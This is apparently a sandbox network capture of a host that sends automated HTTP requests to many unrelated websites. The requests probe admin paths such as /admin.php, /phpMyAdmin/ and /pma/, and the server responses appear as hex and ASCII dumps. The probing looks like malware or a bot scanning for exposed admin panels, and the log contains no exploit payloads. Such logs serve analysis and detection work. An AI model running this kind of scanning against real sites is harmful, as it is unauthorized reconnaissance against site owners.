2023-12-22 20:15:02 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
210	192.168.2.4	49153	141.193.213.10	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	333	OUT	GET /admin.php HTTP/1.1 Host: jaydien.com Accept: / Accept-Encoding: deflate, gzip Cookie: __cf_bm=OzJqjiqHKt6aRbfNvBsKgVdCu_YtKZh4WwGGmG0c.Fk-1703276101-1-AUiI9rA1VB1zODFwTJl3fKqJYVylp2HfLPK9Tyeky1yQxNv2z5D8PKgtXuujpkunUZ5tbQx2WJDb4/+UW8Drc+4= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	1358	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:15:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Set-Cookie: apbct_timestamp=1703276103; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_landing_ts=1703276103; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522b711608b10e1bda40f3fe4b817ac430d%2522%257D; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_urls=%7B%22jaydien.com%2Fadmin.php%22%3A%5B1703276103%5D%7D; expires=Mon, 25 Dec 2023 20:15:03 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:15:03 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Expires: Fri, 01 Jan 71 00:00:00 +0000 Pragma: no-cache X-Powered-By: WP Engine X-Cacheable: NO:403 Cache-Control: max-age=0, must-revalidate, private X-Cache: MISS X-Cache-Group: normal CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 839b08dafe5131cc-MIA
2023-12-22 20:15:03 UTC	32	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:03 UTC	1369	IN	Data Raw: 31 66 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 70 72 69 76 61 74 65 22 3e Data Ascii: 1f96<!DOCTYPE html><html lang='en'><head><meta charset='utf-8' /><meta name='viewport' content='width=device-width, initial-scale=1' /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="cache-control" content="private">
2023-12-22 20:15:03 UTC	1369	IN	Data Raw: 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 6b 2d 62 6f 75 6e 63 65 64 65 6c 61 79 20 31 2e 34 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 31 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 32 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 31 36 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f Data Ascii: s infinite ease-in-out both;animation: sk-bouncedelay 1.4s infinite ease-in-out both;}.spinner .bounce1 {-webkit-animation-delay: -0.32s;animation-delay: -0.32s;}.spinner .bounce2 {-webkit-animation-delay: -0.16s;animatio
2023-12-22 20:15:03 UTC	1369	IN	Data Raw: 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 37 33 61 61 3b 0a 09 09 7d 0a 09 09 61 3a 68 6f 76 65 72 2c 0a 09 09 61 3a 61 63 74 69 76 65 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 36 37 39 39 3b 0a 09 09 7d 0a 09 09 61 3a 66 6f 63 75 73 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 31 32 34 39 36 34 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 62 39 64 64 39 2c 0a 09 09 09 09 09 30 20 30 20 32 70 78 20 31 70 78 20 72 67 62 61 28 33 30 2c 20 31 34 30 2c 20 31 39 30 2c 20 30 2e 38 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 Data Ascii: ;font-size: 14px ;}a {color: #0073aa;}a:hover,a:active {color: #006799;}a:focus {color: #124964;-webkit-box-shadow:0 0 0 1px #5b9dd9,0 0 2px 1px rgba(30, 140, 190, 0.8);box-shadow:0 0 0 1px #5
2023-12-22 20:15:03 UTC	1369	IN	Data Raw: 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 3e 0a 09 09 76 61 72 20 63 74 50 75 62 6c 69 63 46 75 6e 63 74 69 6f 6e 73 20 3d 20 7b 22 5f 61 6a 61 78 5f 6e 6f 6e 63 65 22 3a 22 30 65 36 66 31 30 39 34 63 66 22 2c 22 5f 72 65 73 74 5f 6e 6f 6e 63 65 22 3a 22 34 39 66 38 64 38 64 62 32 31 22 2c 22 5f 61 6a 61 78 5f 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 5f 72 65 73 74 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 79 64 69 65 6e 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 2c 22 64 61 74 61 5f 5f 63 6f 6f 6b 69 65 73 5f 74 79 70 65 22 3a 22 6e 61 Data Ascii: .com/wp-includes/js/jquery/jquery.min.js'></script><script>var ctPublicFunctions = {"_ajax_nonce":"0e6f1094cf","_rest_nonce":"49f8d8db21","_ajax_url":"\/wp-admin\/admin-ajax.php","_rest_url":"https:\/\/jaydien.com\/wp-json\/","data__cookies_type":"na
2023-12-22 20:15:03 UTC	1369	IN	Data Raw: 72 65 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 65 6e 61 62 6c 65 64 20 4a 61 76 61 53 63 72 69 70 74 2e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 27 6a 73 5f 70 61 73 73 65 64 27 3e 0a 09 09 09 3c 68 33 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 74 68 65 20 6c 69 6e 6b 20 62 65 6c 6f 77 20 74 6f 20 70 61 73 73 20 74 68 65 20 70 72 6f 74 65 63 74 69 6f 6e 2c 3c 2f 68 33 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 61 64 6d 69 6e 2e 70 68 70 27 3e 3c 73 63 72 69 70 74 3e 67 65 74 5f 63 75 72 72 65 6e 74 5f 75 72 6c 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 61 3e 0a 09 09 09 3c 62 72 20 2f 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 27 6a 73 5f 6e 6f 74 69 63 65 27 3e 4f 72 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 75 74 6f 6d Data Ascii: re that you have enabled JavaScript.</div> <div id='js_passed'><h3>Please click the link below to pass the protection,</h3><a href='/admin.php'><script>get_current_url();</script></a><br /><p class='js_notice'>Or you will be autom
2023-12-22 20:15:03 UTC	1249	IN	Data Raw: 73 5f 6b 65 79 27 2c 20 65 73 63 61 70 65 28 27 61 62 36 33 34 33 39 62 33 32 62 30 61 31 65 38 34 34 65 35 61 62 36 64 36 66 34 65 32 35 35 39 30 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 77 6f 72 64 70 72 65 73 73 5f 61 70 62 63 74 5f 61 6e 74 69 62 6f 74 27 2c 20 65 73 63 61 70 65 28 27 34 31 36 62 31 38 63 66 62 62 34 66 32 33 61 33 34 32 30 35 37 66 33 66 35 37 31 61 30 33 32 31 33 36 33 38 34 33 31 61 34 39 31 34 65 31 62 37 63 61 64 63 64 37 38 63 31 61 32 63 62 36 63 36 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 63 74 5f 73 66 77 5f 70 61 73 73 65 64 27 2c 20 27 31 27 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 0a 09 09 09 5d 0a Data Ascii: s_key', escape('ab63439b32b0a1e844e5ab6d6f4e25590'), date.toUTCString()],['wordpress_apbct_antibot', escape('416b18cfbb4f23a342057f3f571a03213638431a4914e1b7cadcd78c1a2cb6c6'), date.toUTCString()],['ct_sfw_passed', '1', date.toUTCString()]]
2023-12-22 20:15:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
211	192.168.2.4	65457	64.68.191.221	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	178	OUT	GET //phpMyAdmin/ HTTP/1.1 Host: adelaideclub.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	364	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.adelaideclub.com/phpMyAdmin/ X-Redirect-Reason: Wrong Portal Alias Requested Set-Cookie: dnn_IsMobile=False; path=/; HttpOnly X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Date: Fri, 22 Dec 2023 20:15:02 GMT Connection: close Content-Length: 157
2023-12-22 20:15:03 UTC	157	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 64 65 6c 61 69 64 65 63 6c 75 62 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.adelaideclub.com/phpMyAdmin/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
212	192.168.2.4	65243	217.146.69.50	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	171	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: pistik.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	259	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:03 GMT Server: Apache / ZoneOS Connection: Upgrade, close Last-Modified: Mon, 23 Oct 2023 21:31:51 GMT ETag: "1d7b-60868f3479039" Accept-Ranges: bytes Content-Length: 7547 Content-Type: text/html
2023-12-22 20:15:03 UTC	7547	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404

Session ID	Source IP	Source Port	Destination IP	Destination Port
213	192.168.2.4	49187	34.206.39.153	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	196	OUT	GET / HTTP/1.1 Host: www.org.com Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID=vpc3\|ZYXxI\|ZYXxI User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	2213	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:15:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL/3/SrV7P8AsTHMFSpPmYbyv2PkACHwmG9Z+1IFZq3vA54IN7pQcGnhgNo+8SN9r/KtUWCb9OPqTfWM1N4w/EUCAwEAAQ==_KMXX1whE+LqWlnBOIB0xJLwpzXTVIVXwtPxBqo7TtwcgcTbCRX6lgnGBFcKSpdQQU799kZ0mJJU8T3hRE6kHVQ== Access-Control-Allow-Origin: * Access-Control-Allow-Methods: * Access-Control-Request-Method: * Access-Control-Allow-Headers: * Access-Control-Max-Age: 86400 Link: </packs/js/abp2-e13b4cce38d2e6b3aea7.js>; rel=preload; as=script; nopush,</packs/js/ads-4b8a83b0bbaf60e589e0.js>; rel=preload; as=script; nopush,</packs/js/abp2-e13b4cce38d2e6b3aea7.js>; rel=preload; as=script; nopush,</assets/application-89128245420e03526773926b09a5a7512357bf5fc597732c13596d8a84efe0b7.css>; rel=preload; as=style; nopush,</packs/js/application-28182f954f58ae153a93.js>; rel=preload; as=script; nopush,</assets/style-89128245420e03526773926b09a5a7512357bf5fc597732c13596d8a84efe0b7.css>; rel=preload; as=style; nopush,</assets/generic_lander-8c18c01aab6b1d2ebf833256e6dbdff67d20807e508d45e59875a48594655ea7.css>; rel=preload; as=style; nopush,<///ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js>; rel=preload; as=script; nopush Vary: Accept ETag: W/"eeeb8d9e869e618ca2d8c912a0b76555" Cache-Control: max-age=0, private, must-revalidate Set-Cookie: _digiadmin3_session=xaXt3DXCV8rM3%2FFIxEMnkp%2BrVgabopt54mkwiuhf3Xh4vEoF2Sjxoks6h8VHeBhS3g7lnPtTM3Dfz46AbWK%2BeSuN8QWPAK2khm7M%2F4FtjURoV0ZJgeYeuDGxOBEfMjDWzsEb3wHjsp93%2Fi8PSaOvIOdwk%2FbtxJS7rt9pxfxMfvFEB9rZ1wqnaQUU11uO5P%2B%2BlKXwN%2BibUA8IdjsiKabJNrafrdK9Cl%2FAv%2BY5XDC3jB1BXfulueOQYVgNBGbv1xMJIDxDf2yLbPDG%2BY3QXrJy9zeI%2ByYwLWnIxotR--zFIc4JTJ69tchMVn--t6f5FtZ%2FFjD8go6pkh%2Bc6A%3D%3D; path=/; HttpOnly; SameSite=Lax X-Request-Id: 341b567d-8a8c-4655-a70e-56bf8d3b4751 X-Runtime: 0.083848 Set-Cookie: SERVERID=vpc3\|ZYXxJ\|ZYXxI; path=/
2023-12-22 20:15:03 UTC	11415	IN	Data Raw: 37 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 27 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 2f 33 2f 53 72 56 37 50 38 41 73 54 48 4d 46 53 70 50 6d 59 62 79 76 32 50 6b 41 43 48 77 6d 47 39 5a 2b 31 49 46 5a 71 33 76 41 35 34 49 4e 37 70 51 63 47 6e 68 67 4e 6f 2b 38 53 4e 39 72 2f 4b 74 55 57 43 62 39 4f 50 71 54 66 57 4d 31 4e 34 77 2f 45 55 43 41 77 45 41 41 51 3d 3d 5f 4b 4d 58 58 31 77 68 45 2b 4c 71 57 6c 6e 42 4f 49 42 30 78 4a 4c 77 70 7a 58 54 56 49 56 58 77 74 50 78 42 71 6f 37 54 74 77 63 67 63 54 62 43 52 58 36 6c 67 6e 47 42 46 63 4b 53 70 64 51 51 55 37 39 39 6b 5a 30 6d 4a 4a 55 38 54 33 68 52 45 36 Data Ascii: 7fd<!DOCTYPE html><html data-adblockkey='MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL/3/SrV7P8AsTHMFSpPmYbyv2PkACHwmG9Z+1IFZq3vA54IN7pQcGnhgNo+8SN9r/KtUWCb9OPqTfWM1N4w/EUCAwEAAQ==_KMXX1whE+LqWlnBOIB0xJLwpzXTVIVXwtPxBqo7TtwcgcTbCRX6lgnGBFcKSpdQQU799kZ0mJJU8T3hRE6

Session ID	Source IP	Source Port	Destination IP	Destination Port
214	192.168.2.4	49210	192.178.50.46	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	184	OUT	GET /site/mcammondlife/ HTTP/1.1 Host: sites.google.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	1149	IN	HTTP/1.1 302 Found Content-Type: application/binary X-Frame-Options: DENY Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site Location: https://accounts.google.com/ServiceLogin?passive=1209600&osid=1&continue=https://sites.google.com/site/mcammondlife/&followup=https://sites.google.com/site/mcammondlife/ P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy: unsafe-none Cross-Origin-Resource-Policy: same-site Content-Security-Policy: base-uri 'self';object-src 'none';report-uri /_/view/cspreport;script-src 'unsafe-inline' 'unsafe-eval' https: http:;worker-src 'self';frame-ancestors https://google-admin.corp.google.com/ Date: Fri, 22 Dec 2023 20:15:03 GMT Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Content-Type-Options: nosniff Set-Cookie: NID=511=vOxzlL1iSAiKz-ih0f2l0sEaR2f5OgUTdhxBDSt73Sk0OipHPFs5oRwNkxWLnn6VQVAWb--Wh_zWddCJ2z8gZmh0a0zCJAuuh6Z4SwQpccZDctnU8NCid6ky67oReI2OqZqSLCUbp5IN_G21Olhb6LceX-S4VC69wME6yY3ntmU; expires=Sat, 22-Jun-2024 20:15:03 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
215	192.168.2.4	49162	34.206.39.153	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	210	OUT	GET /admin/login HTTP/1.1 Host: aldine.org.com Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID=vpc4\|ZYXxI\|ZYXxI User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	1400	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:15:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin Link: </assets/admin-c3cec993e40a8cbbfbec9ac43929a8f741267c75edd87a27f07fe71f4648779e.css>; rel=preload; as=style; nopush,</packs/js/application-28182f954f58ae153a93.js>; rel=preload; as=script; nopush,</packs/js/admin-41c10d089a9b82c4a81b.js>; rel=preload; as=script; nopush,</packs/js/tablednd-7691ec9e4b7721f2be15.js>; rel=preload; as=script; nopush Vary: Accept ETag: W/"2d3589d5ed45222e9b6880d4d9828f53" Cache-Control: max-age=0, private, must-revalidate Set-Cookie: _digiadmin3_session=8atq2BxOwc4qu2bSkf5XN%2F0nfYwvePS2hXFNw9ML6eyNF9vY2SJSLM3XH8cjZP8MTKA7F7OrT%2B58ikFzHR6W%2B8W0IuYF0vOCSt8ITXkqJbD0hl%2FhYLI7sFuGpkVAa4o3tJXZETXhCET2P9uzN9EU0I0DZ6Az9JZNQUXRIgruoBI6%2FFpP1WcBa224ZAhSGpA7F%2Bjig5jvjoxlWj5xOzLN4DTAM6B5AXdmbAbLgBCaA6Z82PTw06h9FWYL%2FPRcv5QqNzNuWjkacL%2FoD6JkEGCatlyjzYi6bj%2BI6akk--W%2F72QlzEOPB%2Bv5xt--PHl3MVFNQU7xF1aiXlGFTg%3D%3D; path=/; HttpOnly; SameSite=Lax X-Request-Id: 176c5295-1995-4a57-aa89-f45652309e25 X-Runtime: 0.049163 Set-Cookie: SERVERID=vpc4\|ZYXxJ\|ZYXxI; path=/
2023-12-22 20:15:03 UTC	5725	IN	Data Raw: 62 32 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 64 6d 69 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 64 6d 69 6e 2d 63 33 63 65 63 39 39 33 65 34 30 61 38 63 62 62 66 62 65 63 39 61 63 34 33 39 32 39 61 38 66 37 34 31 32 36 37 63 37 35 65 64 64 38 37 61 32 37 66 30 37 66 65 37 31 66 34 36 34 38 37 37 39 65 2e 63 73 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 61 63 6b 73 2f 6a 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 38 31 38 32 66 39 35 34 66 35 38 61 65 31 35 33 61 39 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c Data Ascii: b2a<!DOCTYPE html><html><head><title>Admin</title><link rel="stylesheet" media="all" href="/assets/admin-c3cec993e40a8cbbfbec9ac43929a8f741267c75edd87a27f07fe71f4648779e.css" /><script src="/packs/js/application-28182f954f58ae153a93.js"></script><

Session ID	Source IP	Source Port	Destination IP	Destination Port
216	192.168.2.4	49286	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	320	OUT	GET /pma/ HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:03 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_aZc5pxsnyjzKSW6udTZkNHF3pIXN9ezb4ge96WY1kLcHkO3BBl/GX610PpaolcZToUMdVbS0H7+6ZuMdbsCK/g Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
